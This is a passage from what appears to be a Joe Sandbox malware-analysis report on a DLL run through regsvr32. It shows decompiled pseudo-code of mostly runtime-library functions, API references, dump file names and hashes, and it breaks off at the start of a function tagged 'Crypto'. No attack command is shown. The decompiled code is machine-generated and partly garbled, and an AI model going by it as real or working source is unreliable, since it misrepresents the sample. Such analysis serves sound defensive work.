				if ( *((intOrPtr*)( *((intOrPtr*)(0x956f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x9501485;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x9501396;
				0x94f9140();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0x95013b2;
				_t182 =  *((intOrPtr*)(0x956f940 + _v120 * 8));
				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0x9501485;
				if (GetConsoleMode(??, ??) == 0) goto 0x950147a;
				if (sil == 0) goto 0x9501457;
				sil = sil - 1;
				if (sil - 1 > 0) goto 0x950151e;
				_t228 = _t230 + _t231;
				_v112 = _t209;
				_t232 = _t230;
				if (_t230 - _t228 >= 0) goto 0x9501514;
				_v80 =  *_t232 & 0x0000ffff;
				_t107 = E00007FFA7FFA09501E40( *_t232 & 0xffff);
				_t128 = _v80 & 0x0000ffff;
				if (_t107 != _t128) goto 0x9501449;
				_t146 = _v108 + 2;
				_v108 = _t146;
				if (_t128 != 0xa) goto 0x950143a;
				if (E00007FFA7FFA09501E40(0xd) != 0xd) goto 0x9501449;
				_t147 = _t146 + 1;
				_v108 = _t147;
				if ( &(_t232[1]) - _t228 >= 0) goto 0x9501514;
				goto 0x95013fa;
				_v112 = GetLastError();
				goto 0x9501514;
				r9d = r15d;
				_v136 = __r9;
				E00007FFA7FFA09500958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
				asm("movsd xmm0, [eax]");
				goto 0x9501519;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x956f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x95014e1;
				_t169 = sil;
				if (_t169 == 0) goto 0x95014cd;
				if (_t169 == 0) goto 0x95014b9;
				if (_t147 - 1 != 1) goto 0x9501529;
				r9d = r15d;
				E00007FFA7FFA09500EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0x950146e;
				r9d = r15d;
				E00007FFA7FFA09501004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
				goto 0x950146e;
				r9d = r15d;
				E00007FFA7FFA09500DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
				goto 0x950146e;
				r8d = r15d;
				_v136 = _v136 & _t182;
				_v112 = _t182;
				_v104 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x9501511;
				_t116 = GetLastError();
				_v112 = _t116;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				if (_t116 != 0) goto 0x9501592;
				_t117 = _v96;
				if (_t117 == 0) goto 0x9501568;
				if (_t117 != 5) goto 0x9501558;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
				 *((char*)(_t186 + 0x38)) = 1;
				 *(_t186 + 0x34) = _t117;
				goto 0x95012fb;
				_t208 = _t186;
				E00007FFA7FFA094FB3DC(_v96, _t208);
				goto 0x95012fb;
				if (( *( *((intOrPtr*)(0x956f940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0x950157a;
				if ( *_t230 == 0x1a) goto 0x9501599;
				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
				 *((char*)(_t186 + 0x30)) = 1;
				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
				 *((char*)(_t186 + 0x38)) = 1;
				goto 0x95012fb;
				goto 0x950159b;
				return 0;
			}

0x7ffa0950129c
0x7ffa095012b2
0x7ffa095012b8
0x7ffa095012bb
0x7ffa095012c1
0x7ffa095012ca
0x7ffa095012cc
0x7ffa095012d1
0x7ffa095012d4
0x7ffa095012da
0x7ffa095012e1
0x7ffa095012e9
0x7ffa095012ec
0x7ffa095012f1
0x7ffa095012f6
0x7ffa095012fe
0x7ffa09501313
0x7ffa09501317
0x7ffa0950131b
0x7ffa0950132e
0x7ffa09501337
0x7ffa0950133f
0x7ffa09501346
0x7ffa0950134a
0x7ffa09501352
0x7ffa09501368
0x7ffa09501377
0x7ffa09501381
0x7ffa09501386
0x7ffa095013a1
0x7ffa095013a3
0x7ffa095013ac
0x7ffa095013c7
0x7ffa095013d0
0x7ffa095013d6
0x7ffa095013dd
0x7ffa095013e3
0x7ffa095013e7
0x7ffa095013eb
0x7ffa095013f1
0x7ffa09501401
0x7ffa09501405
0x7ffa0950140a
0x7ffa09501411
0x7ffa09501413
0x7ffa09501416
0x7ffa0950141d
0x7ffa09501431
0x7ffa09501433
0x7ffa09501435
0x7ffa09501441
0x7ffa09501447
0x7ffa0950144f
0x7ffa09501452
0x7ffa09501457
0x7ffa0950145a
0x7ffa09501469
0x7ffa0950146e
0x7ffa09501475
0x7ffa0950148e
0x7ffa09501492
0x7ffa09501495
0x7ffa0950149a
0x7ffa0950149f
0x7ffa095014a5
0x7ffa095014b2
0x7ffa095014b7
0x7ffa095014b9
0x7ffa095014c6
0x7ffa095014cb
0x7ffa095014cd
0x7ffa095014da
0x7ffa095014df
0x7ffa095014ec
0x7ffa095014ef
0x7ffa095014f7
0x7ffa095014fb
0x7ffa09501506
0x7ffa09501508
0x7ffa0950150e
0x7ffa09501514
0x7ffa09501519
0x7ffa09501533
0x7ffa09501535
0x7ffa0950153a
0x7ffa0950153f
0x7ffa09501541
0x7ffa09501545
0x7ffa0950154c
0x7ffa09501550
0x7ffa09501553
0x7ffa0950155b
0x7ffa0950155e
0x7ffa09501563
0x7ffa09501572
0x7ffa09501578
0x7ffa0950157a
0x7ffa0950157e
0x7ffa09501582
0x7ffa09501589
0x7ffa0950158d
0x7ffa09501597
0x7ffa095015ab

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFA0950123C), ref: 00007FFA095013BF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFA0950123C), ref: 00007FFA09501449

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction ID: d85695e6f89ed2e26629d20424b32f897206bd6d9c602b812b31faf89fa47bd3
Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction Fuzzy Hash: 5D91E262E1CA5285FB50CF76A4802BD27A8BB8E788F448136DE0E57794CF38F449C712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1CE0 Relevance: 6.1, APIs: 4, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 47%

			E00007FFA7FFA094F1CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				long long _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr _t62;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA094F2250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x94f1d3a;
				E00007FFA7FFA094F18F0(__rax, _a8);
				_t48 = _a16 - __rax;
				E00007FFA7FFA094F1DF0(_t48, _a8, _a8, _t48, _a24);
				goto 0x94f1de7;
				E00007FFA7FFA094F2170(_t48, _a8);
				_t62 =  *0x956a228; // 0xffffffffffffffff
				_t50 = _t62 -  *_t48;
				if (_t50 - _a24 > 0) goto 0x94f1d65;
				E00007FFA7FFA094F2230(_a8);
				E00007FFA7FFA094F2170(_t50, _a8);
				_t52 =  *_t50 + _a24;
				_v24 = _t52;
				if (_a24 <= 0) goto 0x94f1de2;
				r8d = 0;
				if ((E00007FFA7FFA094F22B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0x94f1de2;
				E00007FFA7FFA094F18F0(_t52, _a8);
				_v16 = _t52;
				E00007FFA7FFA094F2170(_t52, _a8);
				E00007FFA7FFA094F11E0(_v16 +  *_t52, _a16, _a24);
				return E00007FFA7FFA094F23A0(_v16 +  *_t52, _a8, _v24);
			}

0x7ffa094f1ce0
0x7ffa094f1ce5
0x7ffa094f1cea
0x7ffa094f1d07
0x7ffa094f1d0e
0x7ffa094f1d1b
0x7ffa094f1d30
0x7ffa094f1d35
0x7ffa094f1d3f
0x7ffa094f1d47
0x7ffa094f1d51
0x7ffa094f1d59
0x7ffa094f1d60
0x7ffa094f1d6a
0x7ffa094f1d72
0x7ffa094f1d77
0x7ffa094f1d82
0x7ffa094f1d84
0x7ffa094f1d9b
0x7ffa094f1da2
0x7ffa094f1da7
0x7ffa094f1db1
0x7ffa094f1dce
0x7ffa094f1deb

APIs

Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F226B
Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1D0E

Part of subcall function 00007FFA094F18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F18FE

Part of subcall function 00007FFA094F1DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F1E56
Part of subcall function 00007FFA094F1DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1E98
Part of subcall function 00007FFA094F1DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1EAC
Part of subcall function 00007FFA094F1DF0: char_traits.LIBCPMTD ref: 00007FFA094F1EDB

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F1D60
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1DA2
char_traits.LIBCPMTD ref: 00007FFA094F1DCE

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
String ID:
API String ID: 3922470843-0
Opcode ID: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
Instruction ID: e423deb48b254f37fee4d296ca4fd8178b02f22e9b5d16f1d3442b611f954d51
Opcode Fuzzy Hash: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
Instruction Fuzzy Hash: 2721A16661CA8681DA50DF66F4A116FA370FBCEBC4F504036EB8D87B69CE6ED510CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1DF0 Relevance: 6.1, APIs: 4, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFA7FFA094F1DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t44;
				intOrPtr* _t49;
				intOrPtr* _t51;
				long long _t53;
				intOrPtr* _t54;
				intOrPtr _t61;

				_t49 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA094F21F0(_t44, __rax, _a16, _a24);
				E00007FFA7FFA094F2400(_t44, __rax, _a16, _a24, _a32);
				_a32 = _t49;
				E00007FFA7FFA094F2170(_t49, _a8);
				_t61 =  *0x956a228; // 0xffffffffffffffff
				_t51 = _t61 -  *_t49;
				if (_t51 - _a32 > 0) goto 0x94f1e5b;
				E00007FFA7FFA094F2230(_a8);
				E00007FFA7FFA094F2170(_t51, _a8);
				_t53 =  *_t51 + _a32;
				_v40 = _t53;
				if (_a32 <= 0) goto 0x94f1eef;
				r8d = 0;
				if ((E00007FFA7FFA094F22B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0x94f1eef;
				E00007FFA7FFA094F18D0(_t53, _a16);
				_t54 = _t53 + _a24;
				_v24 = _t54;
				E00007FFA7FFA094F18F0(_t54, _a8);
				_v32 = _t54;
				E00007FFA7FFA094F2170(_t54, _a8);
				E00007FFA7FFA094F11E0(_v32 +  *_t54, _v24, _a32);
				return E00007FFA7FFA094F23A0(_v32 +  *_t54, _a8, _v40);
			}

0x7ffa094f1df0
0x7ffa094f1df0
0x7ffa094f1df5
0x7ffa094f1dfa
0x7ffa094f1dff
0x7ffa094f1e12
0x7ffa094f1e26
0x7ffa094f1e2b
0x7ffa094f1e35
0x7ffa094f1e3d
0x7ffa094f1e47
0x7ffa094f1e4f
0x7ffa094f1e56
0x7ffa094f1e60
0x7ffa094f1e68
0x7ffa094f1e6d
0x7ffa094f1e78
0x7ffa094f1e7a
0x7ffa094f1e91
0x7ffa094f1e98
0x7ffa094f1e9d
0x7ffa094f1ea2
0x7ffa094f1eac
0x7ffa094f1eb1
0x7ffa094f1ebb
0x7ffa094f1edb
0x7ffa094f1ef8

APIs

Part of subcall function 00007FFA094F21F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F2217

Part of subcall function 00007FFA094F2170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA094F1E56
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1E98
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1EAC
char_traits.LIBCPMTD ref: 00007FFA094F1EDB

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 3679362534-0
Opcode ID: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
Instruction ID: 3926931172fa90843f122f7b667477c80203b18ce976ee01d89d33ed17b82d72
Opcode Fuzzy Hash: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
Instruction Fuzzy Hash: D521AD7661CB4681DA10DF66F4A116EA760FBC9BD0F004035EA8D87B69CEBDD560CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09501004 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00007FFA7FFA09501004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				void* __rdi;
				void* __rsi;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				intOrPtr* _t74;
				intOrPtr* _t76;
				void* _t84;
				void* _t88;
				signed short* _t89;
				void* _t91;
				void* _t94;
				signed short* _t97;
				void* _t99;
				void* _t101;
				void* _t103;
				void* _t106;
				void* _t107;

				_t97 = __r8;
				_t76 = __rcx;
				_a8 = __rbx;
				_a24 = __rbp;
				E00007FFA7FFA09502DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
				_t62 =  *0x956e008; // 0x53c008c84601
				_a5176 = _t62 ^ _t94 - __rax;
				_t74 = _t76;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t107 = _t106 + _t97;
				_t89 = _t97;
				 *_t74 =  *((intOrPtr*)(0x956f940 + (__edx >> 6) * 8));
				 *((intOrPtr*)(_t74 + 8)) = 0;
				if (_t97 - _t107 >= 0) goto 0x9501145;
				_t67 =  &_a40;
				if (_t89 - _t107 >= 0) goto 0x95010ae;
				_t41 =  *_t89 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x950109a;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x950107c;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E00007FFA7FFA094FD698();
				if (0 == 0) goto 0x950113d;
				if (0 == 0) goto 0x950112d;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x950113d;
				if (0 + _a24 < 0) goto 0x95010fa;
				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
				goto 0x9501071;
				 *_t74 = GetLastError();
				return E00007FFA7FFA094F3A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
			}

0x7ffa09501004
0x7ffa09501004
0x7ffa09501004
0x7ffa09501009
0x7ffa0950101b
0x7ffa09501023
0x7ffa0950102d
0x7ffa09501038
0x7ffa0950103e
0x7ffa0950104c
0x7ffa09501050
0x7ffa09501056
0x7ffa09501068
0x7ffa0950106e
0x7ffa09501071
0x7ffa09501077
0x7ffa0950107f
0x7ffa09501081
0x7ffa0950108c
0x7ffa09501093
0x7ffa09501096
0x7ffa0950109a
0x7ffa095010ac
0x7ffa095010ae
0x7ffa095010b9
0x7ffa095010c7
0x7ffa095010da
0x7ffa095010df
0x7ffa095010e9
0x7ffa095010f2
0x7ffa095010f8
0x7ffa095010fa
0x7ffa0950110f
0x7ffa09501118
0x7ffa09501123
0x7ffa0950112b
0x7ffa09501132
0x7ffa09501138
0x7ffa09501143
0x7ffa09501173

APIs

WriteFile.KERNEL32 ref: 00007FFA0950111B
GetLastError.KERNEL32 ref: 00007FFA0950113D

Strings

U, xrefs: 00007FFA095010C7

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction ID: 5153c8edd455aee5859786b78f8ba8310569f66d50dfc81c5c82143d04120d08
Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction Fuzzy Hash: CB41B322B1DA8182EB208F76F4543B967A4FB99794F808131EE4D87798DF3CE455C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09502EB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFA7FFA09502EB4(intOrPtr* __rcx) {
				void* __rbx;
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;

				_t3 = E00007FFA7FFA094F6B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x9502ed5;
				if ( *__rcx != 0xe06d7363) goto 0x9502ed5;
				if (_t3 == 1) goto 0x9502edb;
				return _t3;
			}

0x7ffa09502ebd
0x7ffa09502ec6
0x7ffa09502ece
0x7ffa09502ed3
0x7ffa09502eda

APIs

__C_specific_handler.LIBVCRUNTIME ref: 00007FFA09502EBD

Part of subcall function 00007FFA094F6B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFA094F6C0C
Part of subcall function 00007FFA094F6B4C: RtlUnwindEx.KERNEL32 ref: 00007FFA094F6C5B

Strings

csm, xrefs: 00007FFA09502EC8
f, xrefs: 00007FFA09502EC2

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: C_specific_handlerCurrentImageNonwritableUnwind
String ID: csm$f
API String ID: 1396615161-629598281
Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction ID: 2442d22e2dc104557a4ac847a126d6f798102c7ff4d2f722a4d191818359b54f
Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction Fuzzy Hash: C8D05E51C4854745FB392F72204927909984F5E724E09C430CA3C043867E1EA8E48601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09503ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 00007FFA09503F22
RegisterClassExW.USER32 ref: 00007FFA09503F59

Strings

P, xrefs: 00007FFA09503ED9

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: ClassCursorLoadRegister
String ID: P
API String ID: 1693014935-3110715001
Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction ID: e6f53ed7ec4cfd4a754ed9f48c644afc4bf8f5f7c969de6a4708daf0888cbc38
Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction Fuzzy Hash: 2301C432519B8086E7608F11F89831BB7B8F789748F604128E6CD82BA8DF7DE158CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F472C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA094F472C(void* __eflags, void* __rax) {
				char _v40;
				void* _t6;
				void* _t11;
				void* _t12;
				char* _t14;
				void* _t16;

				E00007FFA7FFA094F45C0(__rax,  &_v40);
				_t14 =  &_v40;
				_t6 = E00007FFA7FFA094F6E00(_t12, _t14, 0x956cbd8, _t16);
				asm("int3");
				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
				return _t6;
			}

0x7ffa094f4735
0x7ffa094f4741
0x7ffa094f4746
0x7ffa094f474b
0x7ffa094f4758
0x7ffa094f475d

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFA094F4735
_CxxThrowException.LIBVCRUNTIME ref: 00007FFA094F4746

Part of subcall function 00007FFA094F6E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA094F472B), ref: 00007FFA094F6E7D
Part of subcall function 00007FFA094F6E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA094F472B), ref: 00007FFA094F6EBC

Strings

Unknown exception, xrefs: 00007FFA094F4751

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
String ID: Unknown exception
API String ID: 3561508498-410509341
Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction ID: d990231d9bff1cefac79d2bcd098a8f7f15f077d480304a0e99e83f8844601ea
Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction Fuzzy Hash: A0D01722A1898691DE10EF20E8943A96334FB99308F909432D28C426B5DF2DE64EC340

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 1252, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	2.3%
Signature Coverage:	0%
Total number of Nodes:	899
Total number of Limit Nodes:	7

Executed Functions

Function 00007FFA09503FB0 Relevance: 2283.0, APIs: 11, Strings: 1292, Instructions: 2747
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00007FFA7FFA09503FB0(intOrPtr __edx, void* __edi, void* __esp, void* __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rsi, long long __r8, long long _a8, intOrPtr _a16, long long _a24) {
				signed int _v24;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
